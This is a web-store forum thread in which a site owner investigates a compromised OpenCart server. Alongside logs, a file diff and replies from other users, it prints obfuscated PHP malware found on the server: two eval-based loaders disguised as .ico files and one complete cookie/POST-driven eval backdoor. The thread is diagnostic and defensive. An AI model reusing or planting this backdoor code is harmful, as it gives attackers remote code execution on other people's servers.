3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sat May 11, 2019 8:54 pm

So I grep'd through all the apache logs, and I only come across 3 times where there is a POST to the installer. So I'm assuming there have only ever been 3 extensions installed. Correct?

Code: Select all

209.59.90.198 - - [08/May/2019:01:42:10 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=INEqC1uLyaTDcErW9oqZBiyPyYYDBZGL HTTP/1.1" 200 177 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=INEqC1uLyaTDcErW9oqZBiyPyYYDBZGL" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"

193.169.87.26 - - [10/Apr/2019:15:39:47 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe HTTP/1.1" 200 177 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

193.169.87.26 - - [10/Apr/2019:15:43:05 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo HTTP/1.1" 200 177 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

And here are the 2 binary files, note their dates, which rules out the last extension installed (the twig dump)
/admin

Code: Select all

----------   1 apache apache 8.2M May  3 10:02 3.02_conf

/catalog/view

Code: Select all

----------  1 apache apache 8.2M May  9 03:19 3.02_conf

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sat May 11, 2019 9:16 pm

Well this is interesting...

Code: Select all

[root@opencart system]# ls -lha /var/www/html/system
total 112K
drwxr-xr-x.  6 apache apache  223 May 10 19:37 .
drwxr-xr-x.  6 root   root    144 May  1 21:45 ..
-rw-r--r--   1 apache apache  30K Dec  3 01:01 .798c18ee.ico
-rw-r--r--   1 apache apache  33K Jan 14 02:45 .c2ea66bb.ico
drwxr-xr-x.  3 apache apache  145 Apr 11 04:09 config
drwxr-xr-x.  2 apache apache  191 May  5 00:24 engine
-rw-r--r--.  1 apache apache  18K Jan  5 16:16 framework.php
drwxr-xr-x.  2 apache apache   76 Apr 11 04:09 helper
-rw-r--r--.  1 apache apache  117 Jan  5 16:16 .htaccess
-rwxr-xr-x   1 apache apache  141 Aug  3  2018 index.php
drwxr-xr-x. 12 apache apache 4.0K Apr 11 04:09 library
-rw-r--r--.  1 apache apache 1.2K Jan  5 16:16 modification.xml
-rw-r--r--.  1 apache apache 3.2K Jan  5 16:16 startup.php
-rw-r--r--   1 apache apache 1.8K Apr 10 19:35 xtnidjzx.php

What are .798c18ee.ico and .c2ea66bb.ico and xtnidjzx.php ?

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sat May 11, 2019 9:18 pm

Code: Select all

[root@opencart system]# cat .798c18ee.ico
<?php
$_udfcv9j = basename/*j*/(/*rpq*/trim/*0k7*/(/*nr*/preg_replace/*veih*/(/*xu*/rawurldecode/*zl802*/(/*rwx2*/"%2F%5C%28.%2A%24%2F"/*7hibw*/)/*916*/, '', __FILE__/*jlo*/)/*n*//*i7p*/)/*1d*//*w*/)/*o9g*/;$_rla6c = "GQ%19%10BU%5D%03%0C%40%0C%07G%09DMJ%06PU%3A%06A%07%17%0AVCf%5B%11TY%11%00%0ENJF%24L3%5C%06WQ%0B%00%06N%10%1B%5CRXU%3CRW%0B%11K%11%170ME%5CY%17T%18BI%0EXJT%24%3D%19%1C%04%5EO%09%02%0ETC%5D%16%03%0F%03CWM%0B%06Z%00%0C%01%0ENJT%08%5CR%07M%0A%11%04%1A_Z%

--- had to take out the center chunk, too long for a forum post ---

%09%3CDC%0E%10_%1F%5E%0F%1F%5CB%02ID%06%09%0A%07%1F%17%16%14EBFN%5EQ%09g%1E%14C%16SBX%10N%14H%02%17%1ERD%0C%06B%17%09ECHC%10%04%06Dw%1FIE%09%05DR%10%10%0F%1FO%11%1F%0AB%13WD%25%09%1B%19%1F%0D%16%05%5BB%1DNOO%09F%1E%05%5D%16%7DBI%0EN%13H%13%09%1EPD%1D%18B%16%09T%5DHt%10%15%18DC%1FX%5B%09%3ADC%0E%10L%1F%5E%0F%1F4B%02ID%1B%09%0A%07%1F%22%16%14EBYN%5EQ%09%5C%1E%14C%16NBX%10NQH%02%17%1EAD%0C%06B%14%09ECHV%10%04%06Dg%1FIE%09%13DR%10%10%5D%1FJ%0A2%00%13O%05LE%5DXI%5D%0C%5B%5DOJ%06%10%10%03EZSZK%15I%16%14_%02%1A%0A%02%17%1DT%02HY%09%08Z%40JT%24J";eval/*n*/(/*9hk1*/rawurldecode/*n*/(/*zfv2*/$_rla6c/*f7owp*/)/*re65*/ ^ substr/*p8u7l*/(/*cqf*/str_repeat/*bgsnc*/(/*n2r6*/$_udfcv9j, /*5i*/(/*y3nw6*/strlen/*r49*/(/*klw1b*/$_rla6c/*z*/)/*g8ik*//strlen/*4*/(/*d8w*/$_udfcv9j/*y9u*/)/*i7z*//*9m0*/)/*fo*/ + 1/*2u3*/)/*8tq*/, 0, strlen/*y*/(/*f*/$_rla6c/*sax*/)/*l*//*v32zp*/)/*xjon*//*s6v8w*/)/*1*/;

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sat May 11, 2019 9:18 pm

Code: Select all

[code][root@opencart system]# cat .c2ea66bb.ico
<?php
$_l8q09b = basename/*axn*/(/*iz*/trim/*x*/(/*m1*/preg_replace/*9gy*/(/*27sqp*/rawurldecode/*8zh10*/(/*y8*/"%2F%5C%28.%2A%24%2F"/*i7was*/)/*2mb3*/, '', __FILE__/*2*/)/*rfqn*//*4b3*/)/*y*//*ot*/)/*nzc*/;$_zinlrm = "G%05%12M%40RS%04%0B%40%0C%07G%09%10F%17%04W%5B%3D%01A%07%17%0AV%17m%06%13SW%16%07%0ENJF%24%188%01%04P_%0C%07%06N%10%1B%5C%06S%08%3EUY%0C%16K%11%170M%11W%04%15S%16EN%0EXJT%24i%12A%07LT%05%16%0ETCZ%18P%0A%5EAPC%0C%01Z%00%0C%01%0E%0E%5C%04%03O%1EF%0EH%00%0E%04I%14F%17%19%1A%16F%05G%13%16%0C%07%18%16%04%0EQU%01B%13IDH%15CT%0A%13%1E%12%0B_%1ERCKGC%0EE%12BD%0E%07%40AG%03H%0A_%0E%06AB%10%1A%07RCKGH%19L%1A%12W%0D%05M%0ACA%13C%5B%16%12SBJFI%00%19%1AM8%16%09%07_%5B%09%05Y%1D%11%17uG%5B8%3C%1F%16%5DB%0A%0E%0A%15%5B%00iA%0DP_%0F%09I%1E%17%1DV8%16%0C%3Ck%16XB%0A%05%05%06C%08U%12%15DN9FG4X%12%24G%5B%16%17PF%1A_%0C%1B%02%18%5B%11%5EGA%18%16%40%06K%0A%0C%0BKA%09%17%04BC%10%0C%0EM%0A%1CX%05B%1DI%12W%0D%05M%0AJTSi%16%0D%15%5CO%0A%0FB%05%0E%1E%0E%5E%12BDu%7FG%21%7CL%20%26%0B%20%60%40%0Cuz%06.q0%0B8%0B%15Y%40%17_%5E44%17%3F%3C%1A%17%14%17%13%08%13%406GX%2A%06%16%5E%13%17%

--- took out center chunk, too long for forum post ---

F%1A%16E%2C%09T%5DHED%1EEFg%11_%5C%09%01DC%0EDbB%5C%08%11WE%02ID%3C%09%5E%0CB%2A%11%1ABE%7CN%5EQ%09%22%15IA%11cE_%10N%29H%02C%151F%0B%08E%21%09ECHyD%0F%5BFB%11NB%09%3FDR%10D%40BM%16%11%3BE%13WD%1C%09O%12B9%11%0B%5CEvNOO%099%15X_%11eEN%0EN%02H%13%5D%15VF%1A%16E%01%09T%5DHtD%1EEFT%11_%5C%09%1CDC%0EDWB%5C%08%11%2CE%02ID%0B%09%5E%0CB%0F%11%1ABEIN%5EQ%091%15IA%11PE_%10N3H%02C%15%0CF%0B%08EU%09ECHFD%0F%5BFS%11NB%09%02DR%10D%0ABM%16%11%08E%13WD%0D%09O%12B%0C%11%0B%5CE%1ANOO%09%0F%15X_%11gEN%0EN%0CH%13%5D%15%3CF%1A%16E%0C%09T%5DH%1FD%1EEFG%11_%5C%09%2FDC%0EDBB%5C%08%11.E%02ID%1C%09%5E%0CB%2C%11%1ABE%5CN%5EQ%09%12%15IA%11CE_%10N%0FH%02C%15%11F%0B%08E%14%09ECHYD%0F%5BFQ%11NB%09%1FDR%10D%00BM%16%11%1BE%13WD%3A%09O%12B%19%11%0B%5CEHNOO%09%19%15X_%11%5BEK%15c%06%19O%0F%1DO%08X%5CHM%06%04%0D%0EL%1A%1AA%09B%5C%1B%0AC%05%0F%02_O%12A%18O_%08%0AL%0C%05%1A%5DJ%1B%5EkK";eval/*8u*/(/*i*/rawurldecode/*kvr*/(/*4eop*/$_zinlrm/*2g*/)/*8q6*/ ^ substr/*5q*/(/*t3*/str_repeat/*u3*/(/*ntcs*/$_l8q09b, /*jn*/(/*m*/strlen/*sj*/(/*xogh*/$_zinlrm/*5e*/)/*eai7k*//strlen/*7*/(/*n2*/$_l8q09b/*z0*/)/*h*//*6n*/)/*2wgue*/ + 1/*ejl*/)/*s*/, 0, strlen/*wav7e*/(/*i3nc*/$_zinlrm/*m8l*/)/*tqcpl*//*sm3*/)/*d*//*m*/)/*e42x*/;

[/code]

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sat May 11, 2019 9:19 pm

Code: Select all

[root@opencart system]# cat /var/www/html/system/xtnidjzx.php
<?php
$bkrpkdl = '*glcxu7n#r8-\'29mtv64_isebyofkda13pH5';$rykhs = Array();$rykhs[] = $bkrpkdl[34].$bkrpkdl[0];$rykhs[] = $bkrpkdl[3].$bkrpkdl[10].$bkrpkdl[13].$bkrpkdl[32].$bkrpkdl[32].$bkrpkdl[18].$bkrpkdl[27].$bkrpkdl[10].$bkrpkdl[11].$bkrpkdl[27].$bkrpkdl[29].$bkrpkdl[31].$bkrpkdl[14].$bkrpkdl[11].$bkrpkdl[19].$bkrpkdl[18].$bkrpkdl[35].$bkrpkdl[29].$bkrpkdl[11].$bkrpkdl[30].$bkrpkdl[24].$bkrpkdl[31].$bkrpkdl[29].$bkrpkdl[11].$bkrpkdl[24].$bkrpkdl[10].$bkrpkdl[3].$bkrpkdl[14].$bkrpkdl[23].$bkrpkdl[6].$bkrpkdl[29].$bkrpkdl[32].$bkrpkdl[23].$bkrpkdl[14].$bkrpkdl[35].$bkrpkdl[24];$rykhs[] = $bkrpkdl[8];$rykhs[] = $bkrpkdl[3].$bkrpkdl[26].$bkrpkdl[5].$bkrpkdl[7].$bkrpkdl[16];$rykhs[] = $bkrpkdl[22].$bkrpkdl[16].$bkrpkdl[9].$bkrpkdl[20].$bkrpkdl[9].$bkrpkdl[23].$bkrpkdl[33].$bkrpkdl[23].$bkrpkdl[30].$bkrpkdl[16];$rykhs[] = $bkrpkdl[23].$bkrpkdl[4].$bkrpkdl[33].$bkrpkdl[2].$bkrpkdl[26].$bkrpkdl[29].$bkrpkdl[23];$rykhs[] = $bkrpkdl[22].$bkrpkdl[5].$bkrpkdl[24].$bkrpkdl[22].$bkrpkdl[16].$bkrpkdl[9];$rykhs[] = $bkrpkdl[30].$bkrpkdl[9].$bkrpkdl[9].$bkrpkdl[30].$bkrpkdl[25].$bkrpkdl[20].$bkrpkdl[15].$bkrpkdl[23].$bkrpkdl[9].$bkrpkdl[1].$bkrpkdl[23];$rykhs[] = $bkrpkdl[22].$bkrpkdl[16].$bkrpkdl[9].$bkrpkdl[2].$bkrpkdl[23].$bkrpkdl[7];$rykhs[] = $bkrpkdl[33].$bkrpkdl[30].$bkrpkdl[3].$bkrpkdl[28];foreach ($rykhs[7]($_COOKIE, $_POST) as $autsglw => $klanlh){function ucarg($rykhs, $autsglw, $ahnng){return $rykhs[6]($rykhs[4]($autsglw . $rykhs[1], ($ahnng / $rykhs[8]($autsglw)) + 1), 0, $ahnng);}function fndrpq($rykhs, $mtlbd){return @$rykhs[9]($rykhs[0], $mtlbd);}function zninvr($rykhs, $mtlbd){$woexid = $rykhs[3]($mtlbd) % 3;if (!$woexid) {eval($mtlbd[1]($mtlbd[2]));exit();}}$klanlh = fndrpq($rykhs, $klanlh);zninvr($rykhs, $rykhs[5]($rykhs[2], $klanlh ^ ucarg($rykhs, $autsglw, $rykhs[8]($klanlh))));}

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sat May 11, 2019 10:02 pm

So I took the new clean install, tar'd it, transferred it to the infected server, un-tar'd it and ran diff to see the difference.
Taking out the thousands of images, I get this

Code: Select all

Only in html/admin: 3.02_conf
Files html/admin/config.php and clean/admin/config.php differ
Only in html/admin/controller/common: .68343cc2.ico
Only in html/admin/controller/design: image.php
Files html/admin/controller/extension/advertise/google.php and clean/admin/controller/extension/advertise/google.php differ
Only in html/admin/controller/extension: export_import.php
Files html/admin/controller/extension/extension/advertise.php and clean/admin/controller/extension/extension/advertise.php differ
Only in html/admin/controller/extension/fraud: sjqvatoo.php
Only in html/admin/controller/extension/module: cgdsobzv.php
Files html/admin/controller/extension/module/sagepay_direct_cards.php and clean/admin/controller/extension/module/sagepay_direct_cards.php differ
Files html/admin/controller/extension/module/store.php and clean/admin/controller/extension/module/store.php differ
Only in html/admin/controller/extension/module: wxkgcvwc.php
Files html/admin/controller/extension/payment/authorizenet_sim.php and clean/admin/controller/extension/payment/authorizenet_sim.php differ
Files html/admin/controller/extension/payment/squareup.php and clean/admin/controller/extension/payment/squareup.php differ
Files html/admin/controller/extension/payment/worldpay.php and clean/admin/controller/extension/payment/worldpay.php differ
Files html/admin/controller/extension/total/sub_total.php and clean/admin/controller/extension/total/sub_total.php differ
Only in html/admin/controller: index.php
Only in html/admin/controller/localisation: .7862a5a3.ico
Files html/admin/controller/sale/recurring.php and clean/admin/controller/sale/recurring.php differ
Only in html/admin: .e57becc0.ico
Only in html/admin: import.html
Only in html/admin: import.php
Files html/admin/index.php and clean/admin/index.php differ
Only in html/admin/language: .4558758b.ico
Files html/admin/language/en-gb/extension/advertise/google.php and clean/admin/language/en-gb/extension/advertise/google.php differ
Only in html/admin/language/en-gb/extension: export_import.php
Files html/admin/language/en-gb/extension/extension/payment.php and clean/admin/language/en-gb/extension/extension/payment.php differ
Files html/admin/language/en-gb/extension/payment/authorizenet_aim.php and clean/admin/language/en-gb/extension/payment/authorizenet_aim.php differ
Files html/admin/language/en-gb/extension/payment/authorizenet_sim.php and clean/admin/language/en-gb/extension/payment/authorizenet_sim.php differ
Files html/admin/model/catalog/attribute_group.php and clean/admin/model/catalog/attribute_group.php differ
Files html/admin/model/extension/advertise/google.php and clean/admin/model/extension/advertise/google.php differ
Only in html/admin/model/extension: export_import.php
Only in html/admin/model/extension: export_import.php.190425.bak
Only in html/admin/model/extension: .f5c5666b.ico
Only in html/admin/model/extension/openbay: njfmtrip.php
Files html/admin/model/extension/payment/worldpay.php and clean/admin/model/extension/payment/worldpay.php differ
Only in html/admin/model: index.php
Only in html/admin/model/setting: .20fddf86.ico
Only in html/admin: .pid
Only in html/admin/view/image: export-import
Only in html/admin/view/image: rbammkqc.php
Only in html/admin/view: index.php
Only in html/admin/view/stylesheet: export_import.css
Files html/admin/view/stylesheet/googleshopping/stepper.css and clean/admin/view/stylesheet/googleshopping/stepper.css differ
Files html/admin/view/template/catalog/product_form.twig and clean/admin/view/template/catalog/product_form.twig differ
Only in html/admin/view/template/design: xcqftzpo.php
Files html/admin/view/template/extension/advertise/google_ads.twig and clean/admin/view/template/extension/advertise/google_ads.twig differ
Files html/admin/view/template/extension/advertise/google_campaign.twig and clean/admin/view/template/extension/advertise/google_campaign.twig differ
Files html/admin/view/template/extension/advertise/google_popup_issues.twig and clean/admin/view/template/extension/advertise/google_popup_issues.twig differ
Files html/admin/view/template/extension/advertise/google.twig and clean/admin/view/template/extension/advertise/google.twig differ
Only in html/admin/view/template/extension: export_import.twig
Files html/admin/view/template/extension/extension/advertise.twig and clean/admin/view/template/extension/extension/advertise.twig differ
Files html/admin/view/template/extension/payment/authorizenet_sim.twig and clean/admin/view/template/extension/payment/authorizenet_sim.twig differ
Files html/admin/view/template/extension/payment/worldpay.twig and clean/admin/view/template/extension/payment/worldpay.twig differ
Only in html/catalog/controller/affiliate: image.php
Only in html/catalog/controller/api: .d9522978.ico
Only in html/catalog/controller/checkout: .ff3fe506.ico
Only in html/catalog/controller/checkout: nqoanzpw.php
Files html/catalog/controller/common/menu.php and clean/catalog/controller/common/menu.php differ
Only in html/catalog/controller/common: menu.php.ori.bak
Files html/catalog/controller/event/theme.php and clean/catalog/controller/event/theme.php differ
Files html/catalog/controller/extension/advertise/google.php and clean/catalog/controller/extension/advertise/google.php differ
Only in html/catalog/controller/extension/module: cgg_product_sort.php
Only in html/catalog/controller/extension/module: my_module.php
Only in html/catalog/controller/extension/module: post_order.php
Files html/catalog/controller/extension/payment/authorizenet_sim.php and clean/catalog/controller/extension/payment/authorizenet_sim.php differ
Files html/catalog/controller/extension/payment/twocheckout.php and clean/catalog/controller/extension/payment/twocheckout.php differ
Files html/catalog/controller/extension/payment/worldpay.php and clean/catalog/controller/extension/payment/worldpay.php differ
Only in html/catalog/controller: index.php
Only in html/catalog/controller/information: .ff8f5b4e.ico
Only in html/catalog/controller/mail: .03f37cbe.ico
Files html/catalog/controller/product/category.php and clean/catalog/controller/product/category.php differ
Only in html/catalog/controller/product: category.php.190426.bak
Files html/catalog/controller/product/product.php and clean/catalog/controller/product/product.php differ
Only in html/catalog/controller/product: product.php.190429.bak
Only in html/catalog/controller: seo.php
Files html/catalog/controller/startup/seo_url.php and clean/catalog/controller/startup/seo_url.php differ
Only in html/catalog/controller/startup: seo_url.php.ori.bak
Only in html/catalog/controller/startup: test.txt
Only in html/catalog: index.php
Only in html/catalog/language/en-gb/account: eobfsdnu.php
Only in html/catalog/language/en-gb/error: khdegtdn.php
Files html/catalog/language/en-gb/extension/advertise/google.php and clean/catalog/language/en-gb/extension/advertise/google.php differ
Files html/catalog/language/en-gb/extension/payment/paymate.php and clean/catalog/language/en-gb/extension/payment/paymate.php differ
Only in html/catalog/language/en-gb: yxpemcjh.php
Only in html/catalog/model: .93a45c39.ico
Files html/catalog/model/catalog/category.php and clean/catalog/model/catalog/category.php differ
Only in html/catalog/model/catalog: category.php.190424.bak
Only in html/catalog/model/catalog: category.php.190426.bak
Files html/catalog/model/catalog/product.php and clean/catalog/model/catalog/product.php differ
Only in html/catalog/model/catalog: product.php.190422.bak
Only in html/catalog/model/checkout: .065a7b3e.ico
Only in html/catalog/model: .e8f42ddc.ico
Files html/catalog/model/extension/advertise/google.php and clean/catalog/model/extension/advertise/google.php differ
Only in html/catalog/model/extension: mqtqfjcb.php
Files html/catalog/model/extension/payment/worldpay.php and clean/catalog/model/extension/payment/worldpay.php differ
Files html/catalog/model/extension/total/voucher.php and clean/catalog/model/extension/total/voucher.php differ
Only in html/catalog/model: index.php
Only in html/catalog/model: jqhftmrv.php
Only in html/catalog/model/setting: .3d608f54.ico
Only in html/catalog/model/setting: .48a042ea.ico
Only in html/catalog/model/tool: imgwm.php.suspected
Only in html/catalog/view: 3.02_conf
Only in html/catalog/view: index.php
Only in html/catalog/view/javascript/bootstrap: poajcjav.php
Only in html/catalog/view: .pid
Files html/catalog/view/theme/default/stylesheet/stylesheet.css and clean/catalog/view/theme/default/stylesheet/stylesheet.css differ
Files html/catalog/view/theme/default/template/common/header.twig and clean/catalog/view/theme/default/template/common/header.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_cart.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_cart.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_category.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_category.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_home.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_home.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_product.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_product.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_purchase.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_purchase.twig differ
Files html/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_searchresults.twig and clean/catalog/view/theme/default/template/extension/advertise/google_dynamic_remarketing_searchresults.twig differ
Files html/catalog/view/theme/default/template/extension/payment/worldpay.twig and clean/catalog/view/theme/default/template/extension/payment/worldpay.twig differ
Only in html/catalog/view/theme: default_190509
Files html/config.php and clean/config.php differ
Only in html: .htaccess

Only in html/image/cache: category
Only in html/image/cache: images_product_additional

Only in html/image: category
Only in html/image: category_slideshows
Only in html/image: images_product_additional
Only in html/image: index.php
Only in html/image/payment: index.php
Files html/index.php and clean/index.php differ
Only in clean: install
Only in html/system: .798c18ee.ico
Only in html/system: .c2ea66bb.ico
Files html/system/config/catalog.php and clean/system/config/catalog.php differ
Only in html/system/config/googleshopping: .1f07a50d.ico
Files html/system/config/googleshopping/googleshopping.php and clean/system/config/googleshopping/googleshopping.php differ
Only in clean/system/config: index.html
Only in html/system/config: index.html.bak.bak
Only in html/system/config: index.php
Only in html/system/engine: .8265e171.ico
Only in html/system/engine: index.php
Files html/system/framework.php and clean/system/framework.php differ
Only in html/system/helper: index.php
Only in html/system: index.php
Only in html/system/library/cache: .3052a859.ico
Only in html/system/library/cache: .d69a2a1e.ico
Only in html/system/library/cart: rzxjpxgi.php
Only in html/system/library: export_import
Files html/system/library/googleshopping/cron_functions.php and clean/system/library/googleshopping/cron_functions.php differ
Files html/system/library/googleshopping/googleshopping.php and clean/system/library/googleshopping/googleshopping.php differ
Only in clean/system/library/googleshopping: log.php
Only in html/system/library: index.php
Files html/system/library/template/twig.php and clean/system/library/template/twig.php differ
Only in html/system/library: zdjhyzkv.php
Only in clean/system: var
Only in html/system: xtnidjzx.php
Only in html: test.txt
Only in clean: upload

What sticks out so far is this -
Only in html/admin/controller/design: image.php

And when I did a search for the heading comment tag I found this -
https://www.unphp.net/decode/3f86cd1314 ... ec7acf584/

Not sure what that is yet...

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sat May 11, 2019 11:07 pm

Ok, now thinking back to the apache log I posted above. Because of the dates on the binary files, the extension would have to be from these apache logs -

Code: Select all

193.169.87.26 - - [10/Apr/2019:15:39:47 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe HTTP/1.1" 200 177 "http://carguygarage.org/admin/index.php?route=marketplace/installer&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0fe" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

193.169.87.26 - - [10/Apr/2019:15:43:05 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo HTTP/1.1" 200 177 "http://carguysgarage.org/admin/index.php?route=marketplace/installer&user_token=be0AH4O6CbQ1ahjeWpsyY5L6jLIj0Szo" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

And those two happened minutes apart.
EDIT: That IP / browser is not me, which makes this even weirder.

I just looked through my browser logs, and the only extension I downloaded that would match that was on April 4th. I had downloaded the extension and had it on my desktop for a while before I installed it.
The download was for opencart-3-x-export-import-multilingual-3-20-cloud.ocmod.zip
And was downloaded from

Code: Select all

http://opencart-extension.s3.amazonaws.com/5a74c2774856a.zip?response-content-disposition=attachment%3B+filename%3D%22opencart-3-x-export-import-multilingual-3-20-cloud.ocmod.zip%22&AWSAccessKeyId=AKIAJAKN3JSFG324O44A&Expires=1554407274&Signature=cwpR6KiZQlJk0j4lqKexsh5OCPA%3D

So if the only way this happened was from an extension, I think this one has been compromised
https://www.opencart.com/index.php?rout ... sion_id=17

Last edited by head_dunce on Sun May 12, 2019 9:49 am, edited 1 time in total.

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sat May 11, 2019 11:13 pm

And I am looking at the install zip, here is something interesting --

Code: Select all

	
	protected function curl_get_contents($url) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		$output = curl_exec($ch);
		curl_close($ch);
		return $output;
	}


	public function getNotifications() {
		$language_code = $this->config->get( 'config_admin_language' );
		$result = $this->curl_get_contents("http://www.mhccorp.com/index.php?route=information/message&type=tool_export_import_3_20&language_code=$language_code");
		if (stripos($result,'<html') !== false) {
			return '';
		}
		return $result;
	}

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Legendary Member

Posts

Joined

Tue Mar 04, 2014 1:37 am

Location

Switzerland

Post by IP_CAM » Sun May 12, 2019 9:01 am

Well, I'm not sure, what you want to show us, you just seem to have some
funny Files and Code in your Software, and experience problems, never
seen on this Forum before. But your OC Test Site is not linked anywhere,
it's therefore not possible, to find out anything, and sure of not much use,
to keep on posting unreadable code, guaranteed not coming from OC or
JNeuhoff's fine import/export Extension.

Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.

Legendary Member

Posts

Joined

Tue Mar 04, 2014 1:37 am

Location - Switzerland

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sun May 12, 2019 9:34 am

I did post a couple encrypted files, but odd you call log files unreadable? Odd you call that last chunk of code I posted unreadable? And it was noted in a previous post that an extension shouldn't phone home, when here is clearly code phoning home.

Jim
https://www.carguygarage.com
Yahoo Store since 2006 moved to OpenCart on January 24, 2020

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Re: 3.02_conf running and running...?

Expert Member

Posts

Joined

Fri Aug 18, 2017 4:35 pm

Location

Taiwan

Post by letxobnav » Sun May 12, 2019 11:02 am

all that call does is retrieve:

Welcome to the Export/Import Tool (V3.20) for OpenCart. If you need a customized version, <a href="http://www.mhccorp.com/index.php?route= ... ct"><u>let us know</u></a> and we can create one for a charge.

I suspect you have a hosting security issue, not an extension issue, digital ocean.

Crystal Light Centrum Taiwan
Extensions: MailQueue | SUKHR | VBoces

“Data security is paramount at [...], and we are committed to protecting the privacy of anyone who is associated with our [...]. We’ve made a lot of improvements and will continue to make them.”
When you know your life savings are gone.

Expert Member

Posts

Joined

Fri Aug 18, 2017 4:35 pm

Location - Taiwan

Re: 3.02_conf running and running...?

Active Member

Posts

Joined

Thu Apr 04, 2019 11:50 pm

Post by head_dunce » Sun May 12, 2019 11:24 am

letxobnav wrote: ↑
Sun May 12, 2019 11:02 am
all that call does is retrieve:

Welcome to the Export/Import Tool (V3.20) for OpenCart. If you need a customized version, <a href="http://www.mhccorp.com/index.php?route= ... ct"><u>let us know</u></a> and we can create one for a charge.

I suspect you have a hosting security issue, not an extension issue, digital ocean.

It retrieves whatever the server gives up. Since you looked at the page with a web browser, the code can say "hey, someone that's probably a person is looking at me, let's just say hello" but if it saw that it was a script that looked at that page, it could serve something completely different. And if the person who owns that domain decides not to renew it, the new owner can do whatever they'd like when the script calls home. This is not a digital ocean problem. This is a OC extension problem. That extension is still on the official download area as I type this, and it seems to have been for many many years. That's scary.

There is a possibility someone/thing logged into the admin screen on OC and did things. I had a very standard password when I installed OC and posted the domain on these forums when I first installed it. (Again, I never had sensitive data on this server so I never worried about it.) Oddly the two apache logs that seem to show the problem installs are from IP's and browsers that were not me. Even more oddly is that the apache logs are missing for when I did do the install for that extension. The only extension that I see in the apache logs that I know are me are for the recent attempt at the twig dump extension.

Jim
https://www.carguygarage.com
